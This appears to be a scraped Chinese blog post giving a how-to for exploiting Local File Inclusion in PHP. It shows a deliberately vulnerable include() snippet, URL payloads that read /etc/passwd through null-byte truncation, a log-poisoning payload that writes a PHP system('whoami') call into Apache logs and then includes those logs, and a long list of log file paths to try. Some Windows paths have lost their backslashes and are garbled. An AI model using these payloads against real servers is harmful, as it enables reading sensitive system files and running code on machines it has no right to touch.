zoukankan      html  css  js  c++  java
  • 本地文件包含(LFI)漏洞利用

    代码:

    <?php
    include($_GET['for'].‘.php’);//用于测试本地包含漏洞
    ?>
    

    Linux

    test.php?for=/etc/passwd%00
    

     

    Win

    test.php?for=D:
    eadme.txt%00

    Log Injection

    访问任意页面payload,将payload写入到log中,然后包含log文件执行payload。

    test.php?<php%20system('whoami');?>
    

    DoFuck

    //linux
    test.php?for=/var/log/apache/logs/access_log%00
    //win
    test.php?for=..apachelogsaccess.log%00
    

    可能的log路径

    /etc/httpd/logs/access.log
    /etc/httpd/logs/access_log
    /etc/httpd/logs/error.log
    /etc/httpd/logs/error_log
    /opt/lampp/logs/access_log
    /opt/lampp/logs/error_log
    /usr/local/apache/log
    /usr/local/apache/logs
    /usr/local/apache/logs/access.log
    /usr/local/apache/logs/access_log
    /usr/local/apache/logs/error.log
    /usr/local/apache/logs/error_log
    /usr/local/etc/httpd/logs/access_log
    /usr/local/etc/httpd/logs/error_log
    /usr/local/www/logs/thttpd_log
    /var/apache/logs/access_log
    /var/apache/logs/error_log
    /var/log/apache/access.log
    /var/log/apache/error.log
    /var/log/apache-ssl/access.log
    /var/log/apache-ssl/error.log
    /var/log/httpd/access_log
    /var/log/httpd/error_log
    /var/log/httpsd/ssl.access_log
    /var/log/httpsd/ssl_log
    /var/log/thttpd_log
    /var/www/log/access_log
    /var/www/log/error_log
    /var/www/logs/access.log
    /var/www/logs/access_log
    /var/www/logs/error.log
    /var/www/logs/error_log
    C:apachelogsaccess.log
    C:apachelogserror.log
    C:Program FilesApache GroupApachelogsaccess.log
    C:Program FilesApache GroupApachelogserror.log
    C:program fileswampapache2logs
    C:wampapache2logs
    C:wamplogs
    C:xamppapachelogsaccess.log
    C:xamppapachelogserror.log
    

     

    参考:http://downloads.ackack.net/LocalFileInclusion.pdf

  • 相关阅读:
    spark学习3(sqoop1.4.6安装)
    SpringBoot配置文件 application.properties详解
    十大经典算法
    JAVA中ACTION层, SERVICE层 ,MODLE层 和 DAO层的功能区分
    Spring Cloud 与 Spring boot
    Java 读取 .properties 配置文件的几种方式
    编程实现文件拷贝
    Java中的日期和时间
    遍历List集合的三种方法
    通过Collections将集合转换为线程安全类集合
  • 原文地址:https://www.cnblogs.com/ls-pankong/p/10492916.html
Copyright © 2011-2022 走看看